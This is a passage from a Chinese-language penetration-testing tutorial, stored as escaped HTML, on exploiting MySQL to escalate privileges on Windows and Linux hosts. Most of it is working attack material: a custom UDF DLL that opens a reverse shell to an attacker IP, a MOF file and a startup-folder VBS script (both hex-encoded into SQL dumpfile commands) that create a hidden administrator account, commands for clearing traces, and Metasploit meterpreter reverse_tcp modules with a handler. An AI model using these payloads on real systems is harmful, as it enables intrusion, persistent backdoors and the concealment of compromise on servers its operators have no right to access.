\u589e\u52a0\u7528\u6237\u7684\u547d\u4ee4\u5e94\u8be5\u90fd\u662f\u53ef\u4ee5\u6210\u529f\u7684<\/p>\n<h3>\u5220\u9664\u81ea\u5b9a\u4e49\u51fd\u6570<\/h3>\n<pre><code>mysql &gt; drop function sys_eval;<\/code><\/pre>\n<h2>UDF shell<\/h2>\n<p>\u5047\u8bbe\u76ee\u6807 MySQL \u5728\u5185\u7f51\u60c5\u51b5\u4e0b\uff0c\u65e0\u6cd5\u76f4\u8fde MySQL \u6216\u8005 MySQL \u4e0d\u5141\u8bb8\u5916\u8fde\uff0c\u8fd9\u4e2a\u65f6\u5019\u4e00\u4e9b\u7f51\u9875\u811a\u672c\u5c31\u6bd4\u8f83\u65b9\u4fbf\u597d\u7528\u4e86\u3002<\/p>\n<h3>UDF.PHP<\/h3>\n<p><a href=\"https:\/\/github.com\/echohun\/tools\/blob\/master\/\u5927\u9a6c\/udf.php\" target=\"_blank\"  rel=\"nofollow\" >t00ls UDF.PHP<\/a> \u7b80\u5355\u65b9\u4fbf\uff0c\u4e00\u952e DUMP UDF \u548c\u51fd\u6570\uff0c\u64cd\u4f5c\u95e8\u69db\u964d\u4f4e\u4e86\u5f88\u591a\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057508091895.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057508091895.png\" alt=\"img\" \/><\/a> <\/p>\n<h3>Navicat MySQL<\/h3>\n<p>\u76ee\u6807 MySQL \u4e0d\u5141\u8bb8\u5916\u8fde\uff0c\u4f46\u662f\u53ef\u4ee5\u4e0a\u4f20 PHP \u811a\u672c:<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057523959536.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057523959536.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528 Navicat \u81ea\u5e26\u7684 tunnel \u96a7\u9053\u811a\u672c\u4e0a\u4f20\u5230\u76ee\u6807\u7f51\u7ad9\u4e0a\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057511437230.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057511437230.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u56fd\u5149\u8fd9\u91cc\u987a\u4fbf\u6253\u5305\u4e86\u4e00\u4efd\u51fa\u6765\uff1a<a href=\"https:\/\/sqlsec.lanzoux.com\/ibpoGijd6bc\" target=\"_blank\"  rel=\"nofollow\" >\u84dd\u594f\u4e91\uff1aNavicat tunnel.zip<\/a> \u5b9e\u9645\u4e0a Navicat \u5f88\u4e45\u5f88\u4e45\u4ee5\u524d\u5c31\u81ea\u5e26\u8fd9\u4e9b\u811a\u672c\u4e86\uff0c\u8fd9\u4e2a\u811a\u672c\u6709\u70b9\u7c7b\u4f3c\u4e8e reGeorg\uff0c\u53ea\u662f\u5b98\u65b9\u7684\u811a\u672c\u7528\u8d77\u6765\u66f4\u8212\u670d\u65b9\u4fbf\u4e00\u70b9\uff0c\u811a\u672c\u7684\u754c\u9762\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057520384495.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057520384495.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u63a5\u7740\u8fde\u63a5\u7684\u65f6\u5019\u8bbe\u7f6e HTTP \u901a\u9053\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057523604421.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057523604421.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fd9\u4e2a\u65f6\u5019\u4e3b\u673a\u5730\u5740\u586b\u5199 localhost \u5373\u53ef\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057524473020.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057524473020.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u8fde\u63a5\u6210\u529f\u540e\u81ea\u7136\u5c31\u53ef\u4ee5\u6109\u5feb\u5730\u8fdb\u884c\u624b\u5de5 UDF \u63d0\u6743\u5566\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057526319645.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057526319645.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>\u53cd\u5f39\u7aef\u53e3\u63d0\u6743<\/h1>\n<p>\u5b9e\u9645\u4e0a\u8fd9\u662f UDF \u63d0\u6743\u7684\u53e6\u4e00\u79cd\u7528\u6cd5\uff0c\u53ea\u662f\u8fd9\u91cc\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u88ab\u5b9a\u5236\u8fc7\u7684\uff0c\u529f\u80fd\u66f4\u591a\u66f4\u5b9e\u7528\u4e00\u4e9b\uff1a<\/p>\n<pre><code>cmdshell        # \u6267\u884ccmd\ndownloader      # \u4e0b\u8f7d\u8005,\u5230\u7f51\u4e0a\u4e0b\u8f7d\u6307\u5b9a\u6587\u4ef6\u5e76\u4fdd\u5b58\u5230\u6307\u5b9a\u76ee\u5f55\nopen3389        # \u901a\u7528\u5f003389\u7ec8\u7aef\u670d\u52a1,\u53ef\u6307\u5b9a\u7aef\u53e3(\u4e0d\u6539\u7aef\u53e3\u65e0\u9700\u91cd\u542f)\nbackshell       # \u53cd\u5f39Shell\nProcessView     # \u679a\u4e3e\u7cfb\u7edf\u8fdb\u7a0b\nKillProcess     # \u7ec8\u6b62\u6307\u5b9a\u8fdb\u7a0b\nregread         # \u8bfb\u6ce8\u518c\u8868\nregwrite        # \u5199\u6ce8\u518c\u8868\nshut            # \u5173\u673a,\u6ce8\u9500,\u91cd\u542f\nabout           # \u8bf4\u660e\u4e0e\u5e2e\u52a9\u51fd\u6570<\/code><\/pre>\n<p>\u8fd9\u4e2a\u52a8\u6001\u94fe\u63a5\u5e93\u6709\u70b9\u5386\u53f2\u4e86\uff0c\u4e0d\u8fc7\u8fd8\u662f\u88ab\u56fd\u5149\u6211\u627e\u5230\u4e86<a href=\"https:\/\/sqlsec.lanzoux.com\/iEQA0ijfu6d\" target=\"_blank\"  rel=\"nofollow\" >\u84dd\u594f\u4e91\uff1alangouster_udf.zip<\/a>\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057546316568.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057546316568.png\" alt=\"img\" \/><\/a> <\/p>\n<p>\u4e0b\u9762\u5c1d\u8bd5\u6765\u4f7f\u7528\u8fd9\u4e2a dll \u6765\u53cd\u5f39 shell \u8bd5\u8bd5\u770b\u5427\uff0c\u9996\u5148\u5728 10.20.24.244 \u4e0a\u5f00\u542f NC \u76d1\u542c\uff1a<\/p>\n<pre><code>\u279c  ~ ncat -lvp 2333\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\nNcat: Listening on :::2333\nNcat: Listening on 0.0.0.0:2333<\/code><\/pre>\n<p>\u7136\u540e\u76ee\u6807\u673a\u5668\u4e0a\u5bfc\u5165 dll \u52a8\u6001\u94fe\u63a5\u5e93\uff08\u8fd9\u91cc\u5077\u61d2\u5c31\u5ffd\u7565\u4e86\uff09\uff0c\u7136\u540e\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\uff1a<\/p>\n<pre><code>mysql &gt; CREATE FUNCTION backshell RETURNS STRING SONAME &#039;udf.dll&#039;;<\/code><\/pre>\n<p>\u76f4\u63a5\u53cd\u5f39 shell \uff1a<\/p>\n<pre><code>mysql &gt; select backshell(&quot;10.20.24.244&quot;, 2333);<\/code><\/pre>\n<p>\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057552542660.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057552542660.png\" alt=\"img\" \/><\/a>  <\/p>\n<h1>MOF \u63d0\u6743<\/h1>\n<p>MOF \u63d0\u6743\u662f\u4e00\u4e2a\u6709\u5386\u53f2\u7684\u6f0f\u6d1e\uff0c\u57fa\u672c\u4e0a\u5728 Windows Server 2003 \u7684\u73af\u5883\u4e0b\u624d\u53ef\u4ee5\u6210\u529f\u3002\u63d0\u6743\u7684\u539f\u7406\u662f  C:\/Windows\/system32\/wbem\/mof\/ \u76ee\u5f55\u4e0b\u7684 mof \u6587\u4ef6\u6bcf \u9694\u4e00\u6bb5\u65f6\u95f4\uff08\u51e0\u79d2\u949f\u5de6\u53f3\uff09\u90fd\u4f1a\u88ab\u7cfb\u7edf\u6267\u884c\uff0c\u56e0\u4e3a\u8fd9\u4e2a MOF  \u91cc\u9762\u6709\u4e00\u90e8\u5206\u662f VBS \u811a\u672c\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a VBS \u811a\u672c\u6765\u8c03\u7528 CMD \u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5982\u679c MySQL \u6709\u6743\u9650\u64cd\u4f5c mof  \u76ee\u5f55\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u4e86\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u4e0a\u4f20 mof \u6587\u4ef6\u6267\u884c\u547d\u4ee4<\/h3>\n<p>mof \u811a\u672c\u7684\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code>#pragma namespace(&quot;\\\\\\\\.\\\\root\\\\subscription&quot;) \n\ninstance of __EventFilter as $EventFilter \n{ \n    EventNamespace = &quot;Root\\\\Cimv2&quot;; \n    Name  = &quot;filtP2&quot;; \n    Query = &quot;Select * From __InstanceModificationEvent &quot; \n            &quot;Where TargetInstance Isa \\&quot;Win32_LocalTime\\&quot; &quot; \n            &quot;And TargetInstance.Second = 5&quot;; \n    QueryLanguage = &quot;WQL&quot;; \n}; \n\ninstance of ActiveScriptEventConsumer as $Consumer \n{ \n    Name = &quot;consPCSV2&quot;; \n    ScriptingEngine = &quot;JScript&quot;; \n    ScriptText = \n&quot;var WSH = new ActiveXObject(\\&quot;WScript.Shell\\&quot;)\\nWSH.run(\\&quot;net.exe user hacker P@ssw0rd \/add\\&quot;)\\nWSH.run(\\&quot;net.exe localgroup administrators hacker \/add\\&quot;)&quot;; \n}; \n\ninstance of __FilterToConsumerBinding \n{ \n    Consumer   = $Consumer; \n    Filter = $EventFilter; \n};<\/code><\/pre>\n<p>\u6838\u5fc3 payload \u4e3a\uff1a<\/p>\n<pre><code>var WSH = new ActiveXObject(\\&quot;WScript.Shell\\&quot;)\\nWSH.run(\\&quot;net.exe user hacker P@ssw0rd \/add\\&quot;)\\nWSH.run(\\&quot;net.exe localgroup administrators hacker \/add\\&quot;)<\/code><\/pre>\n<p>MySQL \u5199\u6587\u4ef6\u7684\u7279\u6027\u5c06\u8fd9\u4e2a MOF \u6587\u4ef6\u5bfc\u5165\u5230 C:\/Windows\/system32\/wbem\/mof\/ \u76ee\u5f55\u4e0b\uff0c\u4f9d\u7136\u91c7\u7528\u4e0a\u8ff0\u7f16\u7801\u7684\u65b9\u5f0f\uff1a<\/p>\n<pre><code>mysql &gt; select 0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020204E616D6520203D202266696C745032223B200A202020205175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A2020202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A into dumpfile &quot;C:\/windows\/system32\/wbem\/mof\/test.mof&quot;;<\/code><\/pre>\n<p>\u6267\u884c\u6210\u529f\u7684\u7684\u65f6\u5019\uff0ctest.mof \u4f1a\u51fa\u73b0\u5728\uff1ac:\/windows\/system32\/wbem\/goog\/ \u76ee\u5f55\u4e0b \u5426\u5219\u51fa\u73b0\u5728 c:\/windows\/system32\/wbem\/bad \u76ee\u5f55\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201118\/16056293813642.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201118\/16056293813642.png\" alt=\"img\" \/><\/a> <\/p>\n<h3>\u75d5\u8ff9\u6e05\u7406<\/h3>\n<p>\u56e0\u4e3a\u6bcf\u9694\u51e0\u5206\u949f\u65f6\u95f4\u53c8\u4f1a\u91cd\u65b0\u6267\u884c\u6dfb\u52a0\u7528\u6237\u7684\u547d\u4ee4\uff0c\u6240\u4ee5\u60f3\u8981\u6e05\u7406\u75d5\u8ff9\u5f97\u5148\u6682\u65f6\u5173\u95ed winmgmt \u670d\u52a1\u518d\u5220\u9664\u76f8\u5173 mof \u6587\u4ef6\uff0c\u8fd9\u4e2a\u65f6\u5019\u518d\u5220\u9664\u7528\u6237\u624d\u4f1a\u6709\u6548\u679c\uff1a<\/p>\n<pre><code># \u505c\u6b62 winmgmt \u670d\u52a1\nnet stop winmgmt\n\n# \u5220\u9664 Repository \u6587\u4ef6\u5939\nrmdir \/s \/q C:\\Windows\\system32\\wbem\\Repository\\\n\n# \u624b\u52a8\u5220\u9664 mof \u6587\u4ef6\ndel C:\\Windows\\system32\\wbem\\mof\\good\\test.mof \/F \/S\n\n# \u5220\u9664\u521b\u5efa\u7684\u7528\u6237\nnet user hacker \/delete\n\n# \u91cd\u65b0\u542f\u52a8\u670d\u52a1\nnet start winmgmt<\/code><\/pre>\n<h2>MSF MOF \u63d0\u6743<\/h2>\n<p>MSF \u91cc\u9762\u4e5f\u81ea\u5e26\u4e86 MOF \u63d0\u6743\u6a21\u5757\uff0c\u4f7f\u7528\u8d77\u6765\u4e5f\u6bd4\u8f83\u65b9\u4fbf\u800c\u4e14\u4e5f\u505a\u5230\u4e86\u81ea\u52a8\u6e05\u7406\u75d5\u8ff9\u7684\u6548\u679c\uff0c\u5b9e\u9645\u64cd\u4f5c\u8d77\u6765\u6548\u7387\u4e5f\u8fd8\u4e0d\u9519\uff1a<\/p>\n<pre><code>msf6 &gt; use exploit\/windows\/mysql\/mysql_mof\n# \u8bbe\u7f6e\u597d\u81ea\u5df1\u7684 payload\nmsf6 &gt; set payload windows\/meterpreter\/reverse_tcp\n\n# \u8bbe\u7f6e\u76ee\u6807 MySQL \u7684\u57fa\u7840\u4fe1\u606f\nmsf6 &gt; set rhosts 10.211.55.21\nmsf6 &gt; set username root\nmsf6 &gt; set password root\nmsf6 &gt; run<\/code><\/pre>\n<p>\u5b9e\u9645\u8fd0\u884c\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057532596683.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057532596683.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>\u542f\u52a8\u9879\u63d0\u6743<\/h1>\n<p>\u8fd9\u79cd\u63d0\u6743\u4e5f\u5e38\u89c1\u4e8e Windows \u73af\u5883\u4e0b\uff0c\u5f53 Windows \u7684\u542f\u52a8\u9879\u53ef\u4ee5\u88ab MySQL \u5199\u5165\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528 MySQL \u5c06\u81ea\u5b9a\u4e49\u811a\u672c\u5bfc\u5165\u5230\u542f\u52a8\u9879\u4e2d\uff0c\u8fd9\u4e2a\u811a\u672c\u4f1a\u5728\u7528\u6237\u767b\u5f55\u3001\u5f00\u673a\u3001\u5173\u673a\u7684\u65f6\u5019\u81ea\u52a8\u8fd0\u884c\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u542f\u52a8\u9879\u8def\u5f84<\/h3>\n<p><strong>Windows Server 2003<\/strong> \u7684\u542f\u52a8\u9879\u8def\u5f84\uff1a<\/p>\n<pre><code># \u4e2d\u6587\u7cfb\u7edf\nC:\\Documents and Settings\\Administrator\\\u300c\u5f00\u59cb\u300d\u83dc\u5355\\\u7a0b\u5e8f\\\u542f\u52a8\nC:\\Documents and Settings\\All Users\\\u300c\u5f00\u59cb\u300d\u83dc\u5355\\\u7a0b\u5e8f\\\u542f\u52a8\n\n# \u82f1\u6587\u7cfb\u7edf\nC:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\nC:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\n\n# \u5f00\u5173\u673a\u9879 \u9700\u8981\u81ea\u5df1\u5efa\u7acb\u5bf9\u5e94\u6587\u4ef6\u5939\nC:\\WINDOWS\\system32\\GroupPolicy\\Machine\\Scripts\\Startup\nC:\\WINDOWS\\system32\\GroupPolicy\\Machine\\Scripts\\Shutdown<\/code><\/pre>\n<p><strong>Windows Server 2008<\/strong> \u7684\u542f\u52a8\u9879\u8def\u5f84\uff1a<\/p>\n<pre><code>C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\nC:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup<\/code><\/pre>\n<p>\u65e2\u7136\u77e5\u9053\u8def\u5f84\u7684\u8bdd\u5c31\u5f80\u542f\u52a8\u9879\u8def\u5f84\u91cc\u9762\u5199\u5165\u811a\u672c\u5427\uff0c\u811a\u672c\u652f\u6301 vbs \u548c exe \u7c7b\u578b\uff0c\u53ef\u4ee5\u5229\u7528 vbs \u6267\u884c\u4e00\u4e9b CMD \u547d\u4ee4\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528 exe \u4e0a\u7ebf MSF \u6216\u8005 CS \u8fd9\u65b9\u9762\u8fd8\u662f\u6bd4\u8f83\u7075\u6d3b\u7684\u3002\u4e0b\u9762\u662f\u4e00\u4e2a\u6267\u884c\u57fa\u7840\u547d\u4ee4\u7684 VB \u811a\u672c\uff1a<\/p>\n<pre><code>Set WshShell=WScript.CreateObject(&quot;WScript.Shell&quot;)\nWshShell.Run &quot;net user hacker P@ssw0rd \/add&quot;, 0\nWshShell.Run &quot;net localgroup administrators hacker \/add&quot;, 0<\/code><\/pre>\n<h3>MySQL \u5199\u5165\u542f\u52a8\u9879<\/h3>\n<p>\u5c06\u4e0a\u8ff0 vbs \u6216\u8005 CS \u7684\u9a6c\u8f6c\u5341\u516d\u8fdb\u5236\u76f4\u63a5\u5199\u5982\u5230\u7cfb\u7edf\u542f\u52a8\u9879\u4e2d\uff1a<\/p>\n<pre><code>mysql &gt; select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile &quot;C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\test.vbs&quot;;<\/code><\/pre>\n<p>\u5199\u5165\u6210\u529f\u7684\u65f6\u5019\u5c31\u7b49\u5f85\u7cfb\u7edf\u7528\u6237\u91cd\u65b0\u767b\u5f55\uff0c\u767b\u5f55\u6210\u529f\u7684\u8bdd\uff0c\u6211\u4eec\u7684\u81ea\u5b9a\u4e49\u811a\u672c\u4e5f\u5c31\u4f1a\u88ab\u6267\u884c\u3002<\/p>\n<h2>MSF \u542f\u52a8\u9879\u63d0\u6743<\/h2>\n<p>\u6ca1\u9519\uff0cMSF \u4e5f\u5c01\u88c5\u597d\u4e86\u5bf9\u5e94\u7684\u6a21\u5757\uff0c\u76ee\u6807\u7cfb\u7edf\u4e3a Windows \u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\u8be5\u6a21\u5757\u6765\u4e0a\u7ebf MSF\uff0c\u4f7f\u7528\u8d77\u6765\u4e5f\u5f88\u7b80\u5355\uff1a<\/p>\n<pre><code>msf6 &gt; use exploit\/windows\/mysql\/mysql_start_up\n\n# \u914d\u7f6e MySQL \u8fde\u63a5\u4fe1\u606f\nmsf6 &gt; set rhosts 10.211.55.6\nmsf6 &gt; set username root\nmsf6 &gt; set password root\nmsf6 &gt; run<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057598832602.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057598832602.png\" alt=\"img\" \/><\/a> <\/p>\n<blockquote>\n<p>STARTUP_FOLDER \u542f\u52a8\u9879\u6587\u4ef6\u5939\u5f97\u81ea\u5df1\u6839\u636e\u5b9e\u9645\u7684\u76ee\u6807\u7cfb\u7edf\u6765\u8fdb\u884c\u8c03\u6574<\/p>\n<\/blockquote>\n<p>MSF \u4f1a\u5199\u5165 exe \u6728\u9a6c\u5230\u542f\u52a8\u9879\u4e2d\uff0c\u6267\u884c\u5b8c\u6210\u540e\u5f00\u542f\u76d1\u542c\u4f1a\u8bdd\uff1a<\/p>\n<pre><code>msf6 &gt; handler -H 10.20.24.244 -P 4444 -p windows\/meterpreter\/reverse_tcp<\/code><\/pre>\n<p>\u5f53\u76ee\u6807\u7cfb\u7edf\u91cd\u65b0\u767b\u5f55\u7684\u65f6\u5019\uff0cMSF \u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u5df2\u7ecf\u6210\u529f\u4e0a\u7ebf\u4e86\uff1a<\/p>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201119\/16057604132227.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201119\/16057604132227.png\" alt=\"img\" \/><\/a> <\/p>\n<h1>CVE-2016-6663<\/h1>\n<h2>\u73af\u5883\u51c6\u5907<\/h2>\n<p>\u56fd\u5149\u6539\u4e86\u57fa\u4e8e\u7f51\u4e0a\u7684\u6559\u7a0b\u5c01\u88c5\u6253\u5305\u4e86\u4e00\u4e2a Docker \u955c\u50cf\u4e0a\u4f20\u5230\u4e86 Docker Hub\uff0c\u73b0\u5728\u5927\u5bb6\u90e8\u7f72\u5c31\u4f1a\u65b9\u4fbf\u8bb8\u591a\uff1a<\/p>\n<pre><code># \u62c9\u53d6\u955c\u50cf\ndocker pull sqlsec\/cve-2016-6663\n\n# \u90e8\u7f72\u955c\u50cf\ndocker run -d -p 3306:3306 -p 8080:80 --name CVE-2016-6663 sqlsec\/cve-2016-6663<\/code><\/pre>\n<p>\u6dfb\u52a0\u4e00\u4e2a test \u6570\u636e\u5e93\u7528\u6237\uff0c\u5bc6\u7801\u4e3a 123456 \u5e76\u8d4b\u4e88\u4e00\u4e9b\u57fa\u7840\u6743\u9650\uff1a<\/p>\n<pre><code># \u521b\u5efa test \u6570\u636e\u5e93\nmysql &gt; create database test;\n\n# \u8bbe\u7f6e test \u5bc6\u7801\u4e3a 123456\nmysql &gt; CREATE USER &#039;test&#039;@&#039;%&#039; IDENTIFIED BY &#039;123456&#039;; \n\n# \u8d4b\u4e88\u57fa\u7840\u6743\u9650\nmysql &gt; grant create,drop,insert,select on test.* to &#039;test&#039;@&#039;%&#039;;\n\n# \u5237\u65b0\u6743\u9650\nmysql &gt; flush privileges;<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u5c06\u4e0a\u8ff0\u64cd\u4f5c\u6574\u5408\u6210\u4e00\u6761\u547d\u4ee4\uff1a<\/p>\n<pre><code>mysql -uroot -e &quot;create database test;CREATE USER &#039;test&#039;@&#039;%&#039; IDENTIFIED BY &#039;123456&#039;; grant create,drop,insert,select on test.* to &#039;test&#039;@&#039;%&#039;;flush privileges;&quot;<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u590d\u73b0<\/h2>\n<p>\u7ade\u4e89\u6761\u4ef6\u63d0\u6743\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u62e5\u6709 CREATE\/INSERT\/SELECT \u4f4e\u6743\u9650\u7684\u8d26\u6237\u63d0\u6743\u6210\u529f\u540e\u53ef\u4ee5\u7cfb\u7edf\u7528\u6237\u8eab\u4efd\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u63d0\u6743\u7684\u7528\u6237\u4e3a mysql \u7528\u6237\uff0c\u6982\u62ec\u4e00\u4e0b\u5c31\u662f\u5c06\u4f4e\u6743\u9650\u7684 www-data \u6743\u9650\u63d0\u5347\u4e3a mysql \u6743\u9650<\/p>\n<p><strong>\u5229\u7528\u6210\u529f\u6761\u4ef6<\/strong><\/p>\n<ol>\n<li>Getshell \u62ff\u5230 www-data \u6743\u9650<\/li>\n<li>\u62ff\u5230 CREATE\/INSERT\/SELECT \u4f4e\u6743\u9650\u7684 MySQL \u8d26\u6237<\/li>\n<li>\u5173\u952e\u63d0\u53d6\u6b65\u9aa4\u9700\u8981\u5728\u4ea4\u4e92\u73af\u5883\u4e0b\uff0c\u6240\u4ee5\u9700\u8981\u53cd\u5f39 shell<\/li>\n<li>MySQL \u7248\u672c\u9700\u8981 &lt;=5.5.51 \u6216 5.6.x &lt;=5.6.32 \u6216 5.7.x &lt;=5.7.14 \u6216 8.x &lt; 8.0.1<\/li>\n<li>MariaDB \u7248\u672c\u9700\u8981 &lt;= 5.5.51 \u6216 10.0.x &lt;= 10.0.27 \u6216 10.1.x &lt;= 10.1.17<\/li>\n<\/ol>\n<p>CVE-2016-6663 EXP mysql-privesc-race.c \u53c2\u8003\u94fe\u63a5\uff1a<a href=\"https:\/\/legalhackers.com\/advisories\/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\" target=\"_blank\"  rel=\"nofollow\" 